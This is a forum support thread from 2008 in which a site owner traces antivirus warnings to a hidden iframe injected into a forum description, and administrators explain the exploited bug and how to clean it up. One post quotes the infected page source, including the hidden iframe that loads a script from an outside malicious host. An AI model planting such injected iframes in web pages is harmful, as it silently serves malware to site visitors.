| Author |
 Topic  |
|
|
RhinoOffRoad
New Member
USA
71 Posts |
 Posted - 15 April 2008 : 20:56:16
|
i own http://UtilityOffRoad.com/forum and when you go to the page you get a virus warning. ive reinstalled the board with a copy i know to be clean and then copied the DB over. how do i remove this issue from the DB? browser says my sight wants to run a networking/webcam application from yahoo.
thanks, |
Nathan In Montana
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 02:03:25
|
quote:
Originally posted by ruirib
No warnings for me.
thank you for checking sir. this is the exact warning i get. not only is my antivirus flagging it, but also internet explorer is saying the website wants to load the webcam/network application from yahoo. some of my users get it, some dont. i have flushed my temporary internet files, no difference. i scan the DB directly with my anti-virus and nothing comes up, but when i try to open the DB with access i get a warning from access saying its unsafe to open the DB. i opened it on my testing computer and access opens it just fine but i cannot find the source of the problem. any ideas sincerely appreciated. i cannot let my site develop a bad reputation.
thanks, |
Nathan In Montana
|
Edited by - RhinoOffRoad on 16 April 2008 02:04:08 |
 |
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 16 April 2008 : 02:24:48
|
I run AVG on a work computer and it does that quite a few times, but it's AVG acting stupidily.
Access will give you that warning will all the databases, unless you add the location of your database to the list of trusted locations (a stupid thing, IMO, that I really can't understand). Basically it's stupid behavior from Access as well. |
Snitz 3.4 Readme | Like the support? Support Snitz too |
|
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 10:16:40
|
what is the "webcam/networking" application that internet explorer says my site is trying to run? i installed another clean copy of snitz and replaced the DB and i get the same thing. im running about a dozen snitz based forums right now and copied over one with the same fresh code that i used on this one and no other site does it. the only common denominator is the database.
thanks again, |
Nathan In Montana
|
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 11:58:04
|
quote:
Originally posted by ruirib
The only common thing is likely the URL being used.
i dont understand what you mean by that. i replaced the board entirely with another DB and do not get the error. is there a way to start the board over with a new DB and at least import the membership information from the old DB so i dont have to start over from 1 user?
quote:
I don't think you have anything to worry about. Both IE and Firefox show no issues on your site.
any idea why some users would be getting the warning and some not? even if no real threat exists, perceived threat is enough to keep people away from my site. if i get a bad reputation online as a virus site ill lose members.
thanks again for your help on this matter. |
Nathan In Montana
|
Edited by - RhinoOffRoad on 16 April 2008 11:58:57 |
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 16 April 2008 : 12:10:56
|
| Is someone using a non AVG antivirus getting warnings? My suspicion is that this is related to AVG free version alone, have seen it happen with such sites as a large newspaper in Portugal, with AVG free version... |
Snitz 3.4 Readme | Like the support? Support Snitz too |
|
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 13:54:41
|
| without AVG i still get the warning for the webcam/networking app claiming to be from yahoo. if you load my page and view the source youll find a reference to "<iframe src="http://www.yourxxxblog.biz/js_go_f1.php" in the code. ive just found this and am now looking for the source. |
Nathan In Montana
|
|
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 14:08:48
|
ok, when i go to the URL i pasted above i get the same error from AVG as well as from internet explorer. im satisfied that i dont have a virus on my site, but cannot find where the redirect is coming from. is there a way to bury that URL in my DB and if so how do i remove it? if i replace my DB i no longer get the error.
thanks, |
Nathan In Montana
|
|
|
|
AnonJr
Moderator
United States
5768 Posts |
Posted - 16 April 2008 : 14:30:08
|
There have been some hackers going around and exploiting the bug that was patched back in 1 Dec. 2007. Some of the hacked forums had HTML turned on, and the <iframe> code inserted into the description of one or more forums. If you have not yet applied that patch, you will definitely want to do so. I'd also subscribe to the "Announcements: Security Related Bug Fixes" forum if you haven't already done so.
After all that, I would first check to see if you have any extra Admins that shouldn't be there. If you find one, demote him and then lock the member.
I would then go through the admin settings and make sure that nothing has been changed. (Turning on HTML, changing the forum's URL in the admin options, etc.)
I would then edit each forum and check the description to see if there has been anything added that shouldn't be there. (JavaScript, an <iframe>, etc.)
These steps and more are more fully laid out here: http://forum.snitz.com/forum/topic.asp?TOPIC_ID=66113 |
|
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 14:33:13
|
looking at my source:
<td bgcolor="white" align="center" valign="top"><a href="forum.asp?FORUM_ID=2"><img src="icon_folder.gif" width="15" height="15" border="0" alt="Old Posts" title="Old Posts" hspace="0" /></a></td>
<td bgcolor="white" valign="top"><font face="Verdana, Arial, Helvetica" color="black" size="2"><span class="spnMessageText"><a href="forum.asp?FORUM_ID=2">Admin Log</a><br /><font size="1"> Restricted Access<br /><iframe src="http://www.yourxxxblog.biz/js_go_f1.php" style="display:none"></iframe></font></span></font></td>
i could find the URL but looking through my pages yielded nothing. since this mentioned ""><a href="forum.asp?FORUM_ID=2">" i deleted forum id 2 and the problem went away. trouble is, forum 2 was an admin only, private forum with one single thread in it. it was also only moderators who got that initial error. i saw nothing within forum #2 that would cause a redirect like this but i do have an intact copy of the infected DB for you if you would like to look into it for another possible vulnerability. |
Nathan In Montana
|
Edited by - RhinoOffRoad on 16 April 2008 14:33:49 |
|
|
|
ruirib
Snitz Forums Admin
Portugal
26364 Posts |
Posted - 16 April 2008 : 14:38:21
|
Well yesterday I had searched for an iframe but hadn't found it. The iframe can simply be removed by editing the forum properties for the forum with ID=2. My browser was not being affected by the dang iframe, so maybe my ZoneAlarm prevented me from seeing the effects of the thing.
As you said, however, it's not a virus and it has a simple solution - just edit the forum properties and remove the iframe from the forum description. |
Snitz 3.4 Readme | Like the support? Support Snitz too |
|
|
|
RhinoOffRoad
New Member
USA
71 Posts |
Posted - 16 April 2008 : 14:56:58
|
| thanks again for the help. i came away from this one a little bit wiser. |
Nathan In Montana
|
|
|
| |
Topic |
|
Topic Locked
